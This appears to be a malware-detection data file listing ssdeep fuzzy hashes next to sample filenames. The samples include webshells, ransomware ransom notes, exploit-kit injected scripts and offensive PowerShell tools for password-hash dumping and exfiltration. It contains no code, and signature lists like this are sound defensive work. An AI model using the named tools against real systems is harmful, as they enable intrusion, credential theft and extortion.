+192:TJqh5HScxnFBXB9cDqMDPUKCwWORVtIzjFCOvuWENwfYWZUol/kTIYmt/6BU:TMh53xnFJbXKcK7XkjFCIglAwTIYm8BU,"2016-04-19-TeslaCrypt-decrypt-instructions.htm"
+192:TjiVaH5yYTcUzExB81G5HZWlypm4lVyJDW5EW7FQhTq:TO4HgYTV1W5Wyg8+DW5EWJ1,"bt.php.74"
+192:tIgOrbAwPx8tgSpL9gZRVoprSc9VZ+TLhi158u5ndcV9dUxbJvcJPzWM5QiqMO:tIucJPHODMO,"allsoft.pl"
+192:tICGhpAT4jIOsSK4ACOTD/leHi3/md/T+GLf55Ej66Q3G7Gs:69pAGIOfe7leHi3/kT+GLf5mmJ2Ks,"include.php"
+192:tgg+l7U/P0/eq0JtxZ+5lec3CjumnGfg2QN4b:ello0/ezNZ+feUqxdN4b,"2016-06-30-page-from-chromechurch.com-with-injected-script-pointing-to-Neutrino-EK.txt"
+192:tDsUx2QjvQ3DyxTtbp8brc2pspTncmjMZy3i:hs02ovQ3DyxTtbp8brfpspTncmjMZy3i,"菜刀jsp修改.jsp"
+192:tcxLTpzaUQsf6XxVTTqceog6tm6BLFVjecCWaFpWJMFkqKoaOkthJkEU:tcxLVz56X3q5YDVjKcCRFoJKco5knmEU,"sep16-4.txt"
+192:TBJ0rnKOAdS+Cu21fpYePiCWG7Wok36uaC6dmMGm:TkrnKXfPY7WVo,"bt.php.218"
+192:tAEn++9J3/5GtKpgkKFrmkgY5ImbR+vNEQJ92190tvly3ZNT5AOkfN8qAFUT+Xz+:t+W5ctKpgkmz4J219KMqIaYW,"thumbs.php"
+192:t2yxPWkMFoY7UIi0fw8WMEAdupz8TwikK3MTF6a:tVRWkoo6j+TpiwlK3Mca,"Unreal-ircd-install.sh"
+192:t2BZLLM4I9BXffeyqmz0qCfRfkEbFTlbQsr2ypNCiZYEpxDymgilTrga5NQiDaYs:aZcwqa1TNrlD3d0YEXpw5cZxn/,"Get-PassHashes.ps1"
+192:t1Z+DHi16dzEw4GYZEeZzN+rrLhHZ1ZO1:9+balfCK+rhk1,"2016-02-09-help_recover_instructions.HTM"
+192:t1Z+DHi16d3Er/PYZEeZNnzhYLhEZ1ZW9:9+babTZqzyhh9,"2016-02-11_H_e_l_p_RECOVER_INSTRUCTIONS+acg.html"
+192:s+zU20C4MQk2EbNL688y5InI7eYlwiQrmsw3z:h0lGVb5II7e1SsQ,"kenx.php.2"
+192:szHxUuOjzHsN3PGr02aRZuZivlaTv7DVBui7yGf:sdUuOjzMVPbnmOav7Dz7f,"bt.php.175"
+192:sYP6D2dSA124IrydSFFdSZt4dSZTW9UT9nk9re79/0h845a8qfFyh2+bqqoHoq:sYP6DMLErIM3gt6gqmGIAZ5LqfF8TbqJ,"on.png.3"
+192:sX7nht023bgrckCu0fNYagGf8Z9UsQbL6Dx5cRuGV3cZ5wT+q6IdtumcWV:sX7hjgreFNgN9UsQbL6DjcRuGOMoIdtB,"ob.js"
+192:sX7nht023bgrckCu0fNYagGf8Z9UsQbL6Dx5cRuGV3cZ5wT+q6IdtumcWtz:sX7hjgreFNgN9UsQbL6DjcRuGOMoIdtJ,"jquery-code.su-multipacked.js"
+192:SWRyi0/eqp3iilOAhShIhahchahZIJZQZWndO/:SWt0/eM3iAhShIhahchahZgZQZWndK,"2016-06-30-page-from-lostreschiles.com-with-injected-script-pointing-to-realstatistics-gate.txt"
+192:SwKtohrKCWkdb/KGemyvQqYgQOj/RCCNCbeho+M0jvxt:9U+2GzyvQqYgQ0Nx+0vP,"32bb4a3c330338128f672e6a1741e527_php.txt.orig.001"
+192:S+uDDcNCR6A9RJKkUw9n1fsbDTWdYvUD2wfXFE:S3DXR6AoJKUHid1fq,"hiddens shell v1.php"
+192:SU6s6T6s6calndl+otx2Q3Op9kRkM1suDLTsEyBbu8/hFvNcmjMZy3p:CalnT+oH2QOp9kRkM1suDLTsEyBbu8/X,"菜刀jsp脚本无压缩版.jsp"
+192:STOqGn2MdSdl3bm922lgth/W8mIo8eSQua+kS44SL3OYMg:SCqQ2uGL+gLvE+O,"bt.php.73"
+192:sTghn0kvurPa/faxcltq0b2MRLLKpbWKiTMlmIIMzg/aLU9hJX3akvQgvg:oguirVPxTggj9nr4gY,"uploader_by_Muquit.pl.txt"
+192:ssMHqXXM0LCdd71uzJN6PtZuaWoL4sblnSGGsdTZO:CGHuddxAJN6zpesbln8s/O,"bt.php.68"
+192:sSLgZoWPcQkM5k2id4MdPakNtUcGjxdN9V62B/CQQfskQNE7rU32WcF2o2hmyJeG:sTLC2GwHn+qcrGkoo2hm5kE9+TytDD6,"Iron-Shell.php"
+192:sreT0a6q52e/PVBZdVX51Id3lhDLYEoBTG+Xol9exQlVn6QZjYejS7TAnkJ8OVsa:yje/PPZded3PDqdhXorVj1usyqhn2Ajk,"izo.cin"
+192:SQfvDmiKgHy+kqeDuhNbICTlNWvaxA31jqaKYUlJfg0y:3aUy+JsuBNxyjqYcfxy,"bt.php.122"
+192:SL2lFyOd8LW68x62uaHSIIdYIHOdSpp+XM8:SLI0OB683SIrLF,"bt.php.144"
+192:SKcBdSFx/5SDksH5JndTgwNEsNuabdgRTpaRTpGRTpjK/sWURTpzIb3Mk:NKbSpMp4p9pCV,"bt.php.59"
+192:sjQijPb3WG2pY2uacofEKHkArx3r162dS2P6xFc7ureuSkSehMkGm:KQij/o/EArx56M5em7uiBkSeqm,"bt.php.228"
+192:SIUXNouH1PPkudGMP/xcaOAlGEp/a/VjpwLF4PduqELE:SIsZxsIGM7blGE6vwJ4VuxLE,"coke.php.3"
+192:SInHv6HXuH1PPkudGMP/xcaOAlGEZja/VjpwLF4PduqELa:SInHv6qxsIGM7blGEmvwJ4VuxLa,"404.php.2"
+192:SIjXNouH1PPkudGMP/xcaOAlGEhwzaMa/VEa5IpwLF4PduBXLF4ztuYELE:SIRZxsIGM7blGEbBqwJ4VuBXJ4ztuzLE,"coke.php.2"
+192:SIjXNouH1PPkudGMP/xcaOAlGEh/a/VjpwLF4PduqELE:SIRZxsIGM7blGESvwJ4VuxLE,"coke.php.1"
+192:Si6SBQtSnTwPGTuBPdfnZns2sQ4k2MeWYxe23fwnOsGm:Si62QAnTwPGGdnROk2ZXgIG1,"bt.php.240"
+192:SI0Hv6HXuH1PPkudGMP/xcaOAlGERszaMa/VEa5IpwLF4PduBXLF4ttuYELa:SI0Hv6qxsIGM7blGEvBqwJ4VuBXJ4ttv,"404.php.1"
+192:SI0Hv6HXuH1PPkudGMP/xcaOAlGERja/VjpwLF4PduqELa:SI0Hv6qxsIGM7blGEevwJ4VuxLa,"404.php"
+192:sGasow26iuGu46zeOBhBazE3UubZKbNpq37By4QtD4q:KwXJGOBDamUzbPsV6D4q,"bt.php.143"
+192:S8Et4gtd0FzW9DbpOgQpzp5Npu/VypR3wTtxHvaFoR7JyB7tk:S8EOgtlWf3gbvAIErk,"hackpsycho-spam-mailer.php"
+192:S+8CDv/mcBwMF4ZuaPlCC+wHweUGHw/HWnH3jdS1dzGcba/egBZwMg:S5Ym+SlwvWH3Zua/dBZu,"bt.php.91"
+192:S5sQdIkCAuXam7TA91MN7sE4fX2MVUswLanaRevOft2u5myfPb7s7xCQr:WsQe1hPk14gRfcR2OftJ5tfj7s7xCQr,"hanyar.txt"
+192:+s4KzchiFI0SF8pyE51KxYF6Yv0k1jpucdd7tP26GqiUwxJgovx:+s+hZ0aE51Kxstvdd7M6GZPgo5,"94121edb4cfee886381c72c77f3c9d2f_php.txt"
+192:/s4KzchiFI0SF8pyE51KxYF6Yv0k1jpucdd7tP26GlkAJxJgovZ3:/s+hZ0aE51Kxstvdd7M6GlzPgoR,"8.php"
+192:/s4KzchiFI0SF8pyE51KxYF6Yt0k1jpgcddNtP26GqiUwxJgovZ:/s+hZ0aE51KxsjtddNM6GZPgoB,"9.php"
+192:+s4KzchiFI0SF8pyE51KxYF6Yt0k1jpgcddNtP26GqiUwxJgovx:+s+hZ0aE51KxsjtddNM6GZPgo5,"0fe74559e084213663c61bf8a8dd87d5_php.txt"
+192:+s4KzchiFI0SF8pyE51KxYF6Yt0k1jpgcddNtP26GqiUwxJgovf:+s+hZ0aE51KxsjtddNM6GZPgoH,"8281dcd3ff07ef4517048fc66cc85672_php.txt"
+192:s4aEh1c8U7ijiuaLGj7xrAddS9t8IIrLieQJ0WMw:YEH+krAPZ80U,"bt.php.117"
+192:s2sR5aCGMd0rPb2MQJfgAExYNkmaDcji1HxiSfsko53jcMFyHJabKPssE/RowSkV:FsLVSZ2gAFalf03jfypKJ3lD,"VirusShare_5b6b6ca25c6270c6ec2c427b8809aad1"
+192:s0Mv03JGKeloKb8lhyjQjz3cFSUwNFEKhSgO0CG:ud9oDlwjQcPwNFLhS50v,"Antichat Shell v1.3.php"
+192:rZDK+HhgsgTutM9mp6AfxGY1y4yj7RNgtx3pGmnvm:VDlgsgTui9mtp/9VdE1,"poolmanager.py"
+192:rygDHpNfwYI6tv4ue92ZxVxZT/ObI4FcIH7MuTJeV93Tf9mvx1wH88BWHLZhH0i2:ugcYIQ5eSxVxZT/i3cI5TAVNE5+Qi,"messages.py"
+192:R+YfdS8mXVdWkPEN5uNyuIiztCBS7CSuak5o+6hlexMHfdizGm:RxVSF2CBqDq+Slexqfa,"bt.php.230"
+192:RXASja3jAv0gcM/jOKj2us6kCO7FbWOhl3UidThipuEy:fGUt5OKj2hpiOhRRdipuN,"bt.php.56"
+192:RX8R5EXRi5OLC138MSZM7em5l5SWCRH4bQ:+YiRMVfW5SV4bQ,"bt.php.149"
+192:RVW15pS+iZ/gqjsxu1Ogbo4H4b7GySxdHqQpd7NWj8:RVsKpSfZGPqEpF,"bt.php.141"
+192:RUWuHQOfgo5pg9w6CYSC4AIToZmjeFuE7wfkvXGSANPre7H6S2rk5VSlVt+yEd:RUWoQy64AITMFut8PGZNPre7aSjSDA,"ak74shell.php.php.txt"
+192:ru25MzvGkP0hSKgoPMQnWSvVQlJ4q3uRgDW82wJ7:625MbZ0r5fnWSVaJ/uRgb,"bt.php.60"
+192:rTwF24Y/7l3IEpDckJtx+a2lyc7NzVJyWE9wmO0O0OpA3wILioOT+zasjFfdYWJQ:rTPzl3Z9tx+Z7NzVUTxOErxLioOTkXRc,"simattacker.php"
+192:rSnkUsA1UL8hWTYFxNIuaZDgUsCFb8d6zUsk2mzko6zQLFST6:rZAUwhfvI9ZD2CFbW6Hk2mAzQBv,"test_channels.py"
+192:RmAE+FRFtUSDmt0GlXuAbgbti9Ucx50MXZwcteX:C+FJUSDmqGl7bQtiOs50MicQX,"2016-06-10-pseudoDarkleech-CryptXXX-decrypt-instructions.html"
+192:RlKXMiFMVFh24oxsewy1jY3EBDxbRXnZLSsGm:REXTd4oxsJyV3dbRXhh,"bt.php.207"
+192:rImioFOitYbP+HfmcnvafATKzOjcjqWU5NFIBzHB6QYNS5iLN8OadKk4GBQ:cmi8SPMfmcvEACOYuWUDeRHB6QImiR84,"2016-06-02-cbat.or.kr-SmSnRq.html.txt"
+192:rIIsyy4zW5YjZ2s3IZfOPBuybL1uZR+g/pD3Z:rt1W5XuZuyb0CAp,"anope-ircd-install.sh"
+192:RICGhpAT4jIOsSK4ACOTD/leHi3/md/T+GLf55Ej66Q3G7Gs:u9pAGIOfe7leHi3/kT+GLf5mmJ2Ks,"configs.php"
+192:Ri0yxXw597dcFLcy4NpsuaLMsdSKC6SuO3UAD8Ms:4y2Y8MOskA6,"bt.php.3"
+192:RGXxBRLtrXuVCLEKJ00qgmteypn858zafwENn2:sBltrXukyttz18im92,"bt.php.12"
+192:RGQBMQz+cbhbX9QQQAz5Bu5SArWm8okUIr:RffQQQAzbu5SAKm8obY,"tpl-page.php"
+192:RGjcue8FwOcle8AophL9BkGt1Gjsar38hiw9:cjcueiHcl6oHL7XesW38r9,"bt.php.106"
+192:Re7GPHU3G1EVy/ErScWF7gsYyxmKKYb5dDFfxZtq1YWgE6tcnxSAJogq3j6:w7AU4eycrScWF7gsYJgJxbuwE6tzSo52,"Readme.txt"
+192:R/DIOZP24dS9FgY5Cex8vIIyV0uaK7VlenwG0YCw4j7Gm:VIOZP26WPVJVEwD,"bt.php.219"
+192:RDCm4V0/PbVTStwNvDJGKTsom2DWIlIXv:RPu0/hTStwNg6iISf,"backupsql.txt"
+192:rbeXipBeTlPoV0AYtgTLWurAgAfLP5Fpgam1FM:OLeVTKgAMawFM,"VirusShare_661c138c38a348556ca1f581a01f3e12"
+192:R6/YVkTLbzREHD2iavDMwb8Xr695h3HeJFin0fmm1UpH7:R6o8TiHDkvHb8Xr6tOF1f5SpH7,"bt.php.18"
+192:R5Lu0yA/MXsQByrGzGlDaEiFJhGu/hMr45:fLBT6sQBylJiFJZGE5,"Kral_by_BLaSTER.php.txt"
+192:r2id7LvHJ626W9EK3oXDmQKK09BXP4+tLwDHmHauyWXy7MQV+:r2q7Ls0//4+VwGHaunXy7Ma+,"02.txt"
+192:R1BwTzMRqe4oCnTw6I+hbuJiONEBvySODMXKA4b9mDzoLtZm7ej1XsaKD:R1uHR91I1WBvcOKtp2kLtHepD,"axis2 利用小工具cat.aar.zip"
+192:R11lXYTa5waYLOdMlsGPI6iw1osdFTJUImB4yUNs/dJBomTS5ri7SSDhEJGFd9sn:RnRwaYLOgFkmyUNckmfFI0M,"r57.txt.10"
+192:R0FZdS1KKLRjy+oL7HCnyFgdO0vDx/JHx/JOuarRD0CUx/JbHx/JJcM0:Sb1K1jy+GHCdOAV/JR/JSR4CQ/J1/J4,"bt.php.55"
+192:qYQH6DbIBv88dIw+2e0CRlp4AoNEJB74/Dt:qYNvIBvQv8p,"six.py"
+192:QX57XhZlUmzLwTMo+eaMcJHm/dDLs5WhY+mL1BDZ5t:+57xZmLnCt,"invoice_l3IErJ.js"
+192:QwCdSZY41oF476HPVcIUGN8qKiL/2uaNhLrSupyM4:jYF4u31iNmx,"bt.php.99"
+192:QVZLORlRQ0CRp7dBDcAGmmCdlSX1vPsvegHta+5INfErCTo3X/7VdGQUhUVs9g7u:QD4LNCRpd6XklSXlsrHVSfECTono9k2,"Shellbot_IRC_Bot_by_devil.v0.2a.pl.txt"
+192:qv/rmhakldEv/rrO7clAaLPv/robC8ctAaBfv/8UQBT/vheOrR:qQJAkuicfyzhjrR,"PHVayv.php"
+192:Qv2niuN/iRE8nMeyq8oqhCNFgoLbDqbqeE:5nTohMh74FXbyE,"Recovery+jyvdq.html"
+192:qRVFKGoGryjyKjKFVGKVPHuP8riIMVPHTTDWnB/Za/D:KVFKGHryjycKFVGKVvuP8WIMVvff,"sessions.py"
+192:QQBOBaFd4VZPSB9BQasx8GlkaVqVPzvOTBM5uKRV/Duh:QQB+44nC5VCkEYzvOS3Duh,"bt.php.46"
+192:qpgUpUHpZ5Myf0/9dciooaEp7HUhSSUeHbiFBgDau6USIaUjSh0xDLKu6U/asoac:qa2UJCFiICZWM2mti9xr,"pbot2.txt"
+192:QlFte5GwFM01JvGiECQ0x67AGtWbaI/FsMdzQ:QlO5GwVeh0xcA1D/u6zQ,"20160202-155510-VrBEvmjuZ1YAADduWGUAAAAA-file-ovvC7n.1454392510_1"
+192:qla+K8nnsnQPh7aSJJJkSeIUHV4cpOTJFSwTDEv:ua+K8nrPh7akrwHVPOt7E,"modernizr.js.txt"
+192:QK+9gdtrqaLmdyE4+gLBodVuVQo+FR1Kzb8/Okr0nQBtB3d3z8bDqL28eXgEHrsR:QF9UOaOGByVUQnT1yQOK0QZd3zEDqL26,"tmp756E.tmp"
+192:qjgUCbczc15PlWZAc9LTjrp+CZoWjwE8JrFLXZJpnO65uZ5:qjgqIvGJ1RHHmQ5,"sheller.txt"
+192:qhMGR/pWI4WK8KxsD7noRCAl43YcKBMGdzdKwCDs7qtgZUZlsGl:qSc/pWI88JD7szcmjpicGl,"RootShell-v2.0.0-2.php"
+192:qhMGR/pWI4WK8KxsD7nKCAl43YcKBMGdzdKwCDs7qtgZUZlsGI:qSc/pWI88JD7AzcmjpicGI,"rootshell.txt"
+192:qhMGR/pWI4WK8KxsD73CAE4PYcKBMGdzdL+hwV:qSc/pWI88JD7grcmqGV,"Rootshell_by_SR-Crew.v1.0.php.txt"
+192:qgBCimgC7WuBUDjKeaa7sOO4W7MZiwAKUEwR6SJCyig+4ya:qKCi2RgWKDw9x,"b50edf928eee352c7d37734183117d8e_php.txt"
+192:Qe8jLj2aqwC6ty7cx+UjvSC6fMfOoo3qRY+Y:QeEPvU,"filesystembrowser.aspx"
+192:QdadSNPBeCsqz26/c2F2iwzRuaLBx+BxIb3BxJbfBx0Mk:9Bgt29Bx+BxuBxVBxu,"bt.php.184"
+192:QbvPK8wtuv/zmXuvr3lxuvr3YhPvU2oaVW9S3d/zL:QbvS8wtuv/Wuvr3lxuvr3hi/H,"Invoke-ShellcodeMSIL.ps1"
+192:qaY1aXqgb0+zXZpPO/SjzAjdzg4fj0nybeUjuonoxic8U:qFIXb0+tpPO/SjzAi4fj0ceUjboxik,"2016-08-24-page-from-curbco2121.com-with-injected-script.txt~"
+192:QaIXglP73hmwDAQrzB5SBa+GycWVz37sqxotjs:QaIQlz3XrzB6a+RF3hotw,"2016-06-02-other-Angler-EK-payload-CryptXXX-decrypt-instructions.html"
+192:Qa5c4QC/+ok63jbyHaCLf+yLNa+i8HOc633V26iaMtUKA+C:Qa5c4QC/+Q3jby5TNab33yI+C,"Out-Word.ps1"
+192:Q9Puu/uFcfYfg9Sz4rDL4L1gTRi6nxvqw:qPuwRSz4PU1gA6Uw,"home_16.jpg.49"
+192:q3k1XYTa5waYLOdMlsGPI6iw1osdFTJUIOB4yUNs/rBBq8mIBri7SSDh5JgFd9sq:qUhwaYLOgFEmyUN++8BFIZM,"footers.php"
+192:Q38hHE7fI8mcMmSroNsy17xG36vC6IdKTBRhxhxhA:Q38hHE7fFmlmhDhxw+C69TfhxhxhA,"wifopdhk.oja.vbs"
+192:q0OjzppnTZ6OQGSOhYiOrWQWWVJjCYGpxpF4w:NOjzbTZaFOsHVMHF4w,"bt.php.28"
+192:pZQdSld4yHYiB4HATEuaP60z6FMY6R6gMn9jMgb:HS6Oh2Qpg9,"bt.php.25"
+192:pzOU4yoebmQQYiKYWj8q8lCWDmbpvCD8XURGksvVJ0q:pqU4yoMmTl+80WUpujRC,"Asp_Aspx_Php_ By_TNT.JPG"
+192:p/z/fT/x7VhEuuvJ0zycuaxRkdSJha4MY:lfDGdoRmVe,"bt.php.115"
+192:pYtzgDoa5qksgyTXK1lb90AclYtzgDF6YXWGcFjuEAr4rAsWvfV4:pY9gDvKlY9gDF6mijuEAr4rAsWvfO,"sendme_old.txt"
+192:pyIf+9HhjMrBDVnorI/6xUYDv1BLdJErFB+ItpH:YIfajMrBDVnorI/6xUwvv3ErFB+mR,"terminal.py"
+192:P++Yb6HEFfiHc9RSChdOSjGWVvyjecNOnPNC:PIGHyhnPNC,"test_file_grep.py"
+192:pW7uiuorK908zG57zs2nxEIL0KKE7DIWpqt9EqoydeGUkqMuwp2f5Bu/pMbonqVr:sCjj3OnGILpT7MHMbon/6oryxT6W,"cpg_by_rgod.v1.4.3.php.txt"
+192:psHx6Ydks7IOJQqzfMkyAdhO1YHep81BAFxGsGm:GHCssOJQqzU9ShOyHeVFxd,"bt.php.213"
+192:pQXXpXxwE29+HiffiwBT0pcVmHU52L1o6Qg9YO+ts1EvGCc:CJ3hwPEHU52L15YO+ts1EvGCc,"database.php"
+192:pOEdSpIxYreG8SW0TZ/UvtRcSMyGMNuaXMQM0HYG7MCL:FHuqLFaSAQtTHfL,"bt.php.113"
+192:pO3cKq/akGai40cJz9xyX5n5QHpqvhJ3MdU2s80gCbEkUiQaKLAGtDWnj:M38/Ya2cJiX5LhJ37i0LBKRDWnj,"pwd.txt"
+192:pNM1NXQOdbYOrO5mLAmOwPDK8CWUv5jiYHX1OhmfF+:qNv2OaULAmdPDKlWUxjhlE,"Add-Exfiltration.ps1"
+192:pN8lqlNtfe7XyoS7ywKtiNowxJ+dhJznCQDJDdoa2Jc6B:ppuTS7WnOnuc,"Backdoor-PHP-fr.php"
+192:PN2A9lBYkg+F7ViHHscjyMpEVfP0yuDi6/pQEHM1nmpS8fvUWSdqgnFYblbPvTwW:PU6MkrinGMZ5X1unmxvUWSgaFYZbPkjq,"no.rar.001.001"
+192:pL3M2XHUaqQMNI/Q28Q8ZQgKQSVclsix6FlhlJk2IZGqYTT/iR7l7whizS+qjB/P:p7t2QMNI/Q28Q8ZQgKQSJqYTuR56n1l,"r57.txt.003"
+192:pL3M2XHUaqQMNI/Q28Q8ZQgKQSVclsix6FlhlJk2IZGqYTT/iR7l7whizS+qjB/O:p7t2QMNI/Q28Q8ZQgKQSJqYTuR56n1o,"r57.txt.3"
+192:pL3M2XHUaqQMNI/Q28Q8ZQgKQS3clsix6FlhlRk2IZGxYTT/iR7l9whizS+qjB/t:p7t2QMNI/Q28Q8ZQgKQSjxYTuR5Yn/F,"by_corey.txt"
+192:pL3M2XHUaqQMNI/Q28Q8ZQgKQS3clsix6FlhlRk2IZGxYTT/iR7l9whizS+qjB/k:p7t2QMNI/Q28Q8ZQgKQSjxYTuR5Yn/c,"hatchbacki_reg.txt.1"
+192:pL3M2XHUaqQMNI/Q28Q8ZQgKQcOclsix6FlhlJk2INMqg4h/dR7l7whizS+qjB/j:p7t2QMNI/Q28Q8ZQgKQFqg4XR56n1J,"cmd.txt.1"
+192:pL3M2XHUaqQMNI/Q28Q8ZQgKQ9clsix6FlhlPk2Id80oox/VR7l9whizS+qjB/nr:p7t2QMNI/Q28Q8ZQgKQx0oovR5Yn/T,"cmd.txt.3"
+192:PIsvDMs0PGuKXhx13gMK782bKJG7O5N66HcQawDKJG7g5N66k0KJG7O+66F:PIsvtTuwwMWb37sQyPawD37wQm37qi,"vectors.py"
+192:PGMEud2mrVlvRKOOclZAgRXwR5ugDi412:ONuoetOAZAeXIugS,"bt.php.189"
+192:Pf6hF37WRWW6PbtytzHugCIzQuNlVNRkG+:XSh75btuzfCIlg,"bt.php.125"
+192:PedFHCRNH2qlALbUXU2oU5uaIjU4ddS5Vw4oSs1M0:mdVtUXULU8jUyGoh,"bt.php.37"
+192:PaNxJd9IA94NPchGqhnjdSh+t6mIIFtw9sg+BA:PaNHDONkNjdH6mII6sgYA,"eb5c77313703961445c8cdf1c8f4e55f_php.txt.orig"
+192:paj0puajXZX2xCCYmslQuYcDzvE2HLueoINiFhSAD6maJi/LkNxG:8gp2Enmw1Xw2yEM0M/aJAUG,"0054501_001216.js"
+192:p0vckisLce41IhCCGLHQIvxlHcefjvk3pvOyJYgh7RH9h3gWsCllM:Cv54UZTGw7RdyD,"t57shell.php"
+192:oziXO+G9aojwpXihlKqqJzqqhg67XUXmECKT/3vpJ7tI8p:wF++Nx26Pao,"tuo.aspx"
+192:OYs/FVMSnbPPiPn9/233grST5rj0qfVX3u3ct4+:MwSnDP0n9yh5X+3s4+,"bt.php.98"
+192:oYKThBLaGSCreSCB0pfGQCOcCI+CeF6PynQ5YtjsWq3xCrmClCVCJkl6jyn8qOvs:zK9MgdWfC6/LUQpH7+H70EA,"Get-ComputerDetails.ps1"
+192:OxPjdSlC4pTT50jf9RVj2uaL/dJMRD7s6BCM0:cPZNG09Rk/sRD6,"bt.php.9"
+192:oXms40m1+GFGq35DMa3tFjyQN/NtijdWxReiaLXQ:oXms40m1+GFB35PzN/NtgWoXQ,"Out-Excel.ps1"
+192:Ot+ju5ACiG8jRFBJNmvo0gIcHKIt5XOHlSP2YCQN:Ot+ixS5J0HgBPy0PDX,"2016-04-13-pseudo-Darkleech-script-returned-from-dpvuppocw.hopto.org.txt"
+192:osIJy00sXGGJl1Nxl9JUkj7j9BptPyM2DVUT3:7IRdL1NxlpPj9TAM3,"bt.php.4"
+192:OotdSJa7/SHzDLEpnDLIitYeUcYlua3FroHAyoHDyzoH2oHoW2Mhm:ZBbSTHqDBYOUF0HAvH7H7HoWM,"bt.php.5"
+192:ONhdaXAShl9ceJozhNwy9JYtUuancqLudSBKKDDbZMc:ONhda7hLc1+y9Ktk1LkHCDbH,"bt.php.119"
+192:oloUX65wMEytPsqxSK+Ej9afEqAmP0CHyJ0X3C7k:oldX65wahTQK+ACHpHi0X3C7k,"red.txt"
+192:oKbdSdMzc3UH+t5HovvxinuSw0SIuaSVSTEAKFsIOA5ia/sMw:oKx1zc3k+tFWUuDJTVSTbKFsIJq,"bt.php.178"
+192:oisEvsUk3HK6gb04J2A2kH02DR4n43qXLAb1ruWsGm:oDUSqXg4JzJ0KyTbAb0N,"bt.php.237"
+192:OGNQMzidv63+neMixY+9p9GIa1k5BtNjbR1DsJJgBXLCQE0TL5r0Sgx1P/w132Mh:OGN/zidvjeTHpAW5HNXR1oAL5E0TL5GY,"404.php"
+192:ofNlQyicQq/BIkwbp/YTKs4xZ+m0s8Lu1nt845u:ofwRq/Skwbp1sacixib,"bt.php.90"
+192:OEOva7KUKbAZ67E4iUsVs+Wu8OofMB/X5T7lX1J+KA4VBdLLwsGm:ORahKbAZfysVsDdfgV7Z1JmQdvP,"bt.php.239"
+192:ode5lkhx/0KxeTb/D1SbbWS1angWbpy2EoMT2187zYVRQFfMB:1ihlkH7Qb7anxbg2Eoc2187zdOB,"webshell-pwd.txt"
+192:OBqX3hv3tQTBomV/8Go41qDyDlUz0ATU45L8GEy8muWlnat8:OQX3hvtQTBoqPo4YDyDlUbLLuunD,"mal.php"
+192:OBe8/2aqwC6ty7cx+UjvSC6uOkorqRw+O:OBeyPo,"filesystembrowser.aspx"
+192:O5JQqPT99iuhoiqR+kbhlibSiUBikLSiwbaxNQRw:XiqR+kNli+i1w,"dev_core.php"
+192:O4uMJqZYdypCnCyDAL0VUQWmRVLrnEBta11OQQ5D4kI+NkeVZDaZfxuyZ/af+3f9:BuOqqrf3lhUta1AH5Do+/jcN,"guest.jsp"
+192:o38hHE3fI8mcMm/WNsy17x+6vC6uKTBRhxhxhs:o38hHE3fFmlmuDhx++C6LTfhxhxhs,"kxqkvvlq.0ud.vbs"
+192:O38hHE3fI8mcMm/WNsy17x+6vC6uKTBRhxhxh+:O38hHE3fFmlmuDhx++C6LTfhxhxh+,"ydygpwq0.k3c.vbs"
+192:O1s3j/JDue0VAFzKpgLgOV1JWAZB5e06KTi9w+5PSxPV6N3Gp:hTJDXD806KeaSKxd6xk,"e86b0211138a3b055a64965bc2a12c37_php.txt"
+192:Nzm7AD+LJTjMWt9AnlotLp1KOOPRi9DCQPTdmiyA8jd8Emk3Xc/MbKKQvtttCllK:Zm7bbUcvV,"OSIRIS-d03a.htm"
+192:n+y5/H2+tJuBdfGy523a/AmqNiEZ9aalko+HTBYUij6P2wQnzG/H21titq+7koVb:w,"qjkwczbv.php"
+192:Nu5aCJVWx6F0ALcS+R3vdaMLQ1jyBcJ1xoyaPuzBE9a6cV7CLuwAtuhv6:Nu5aFOivLLnoYg,"SSMSPwd.cs"
+192:NtwmXIeQsKrOypwbuXtdXRI8x9OIfeLIT8qaAa:NqYQsW3ne2WLIT85Aa,"INSTRUCTIONS_FC83AB84.txt"
+192:nS2po+K9loEUQ1pUVOjZ10vlCELgEveJu:zpo+K9loEUQ1pUVOjZ10vlvg4Su,"info50.php"
+192:NRh+yF/0XxXakIpgnj6e2M06HlDKzCn1/fp/q8puXLX7OfoDYkWP56FN:BBFaXak4gg+HlDlULyfoMR5sN,"tips.md"
+192:NQtjv0bj7tJ4q89i8V7y+Q7cmSUwNXMEKhsD2O0b6RWUE:Nej2jL4qinVW++cQwNXMLhsDv0w2,"Antichat Shell.php"
+192:NPgGy+ChwSFHkueyE+C/dw1U2Vk+EndG9X5Mf8x6p1PdFrrELtMIfiA7KcMYtv/d:NwhB8hmDDRMIfiA7KbYtv/d,"CasuS 1.5.php"
+192:Np77VDmDRIy9jjGHjory84DCWYKMB0xtWxMARMHTzj8yJJzB5B2llsxYwwY+OrUh:y,"2016-06-27-Locky-decryption-instructions.bmp"
+192:nMP+0Fz3Ie9D5pO1CTp5OuNVDvT5SH6C6sRpXbyOgxE5AKNKfwlx:nMPpnjeExE5AKNV,"raw4.5317"
+192:nMLPUT2JhF6uHOvtZXlZuOs1xF4UHnKr4:CPUT2JhF6uHOvtZXlZuOs3Fsk,"javascript92.php"
+192:njdIpJ400VpaVDAResBIrsYoZSPLQ2gTr005e00E900rmITRYomMfOSG0dvdG8NN:jdIpJ400VpaVDAResBIrsYoZSPLQ2gT9,"xml27.php"
+192:NiWIlIXYYuheXdgBb2/6atuv+odSui9rg/FxJhxrsS2SZSHNSr:vISPtu2q/i9rg/FNb,"spygrup.txt"
+192:nhorosMoTpAmn3TjUWa334oo7Mabp3jjfjTvMjCCMRfRtbj5jUvwbj3RvjRij1A5:h2osMoTpAmn3TjUWa334oo7Mabp3jjf7,"cache74.php"
+192:Ngn84tWbUhQi+r/8wCgB0XuoBQi6cHf3cMkJ6Ykmsvc5Lsb5yARTr5do21oO0dJR:Ng84QesM2i6Mslo2g9O22LR,"xcu_cmd.php"
+192:nFmiFCBfkVZkT+yDWdSBI1S7oM4AwqjpildmYqc59Qtk6metfGZbg6s:nFmKHjE5sQElmYqaYk6metfn,"bonze.jpg.1"
+192:NEngW36QuST94TaSUuawEHeXgB2ndSNBMMo:Ot3KS4cz2dJ,"bt.php.93"
+192:nejQ8+bTQUO1ZIx0KKSwXOhOJfONfbE1hvRApGIxgpUTg0wWPxTow+j:n1TQUO1ZOKSwXOhOKDElAuQhPFi,"2016-03-04-ksvi.co.kr-jquery.js.txt"
+192:ne+dnziUbaBMsmGpGGrbhJZ9tNh3G6mIVvqKSAcz8DJVUByI/mi4bs:3dLLP6mIVvqKoz8JVUByI/oo,"2016-06-29-page-from-nebularoficial-with-injected-script-pointing-to-realstatistics-gate.txt"
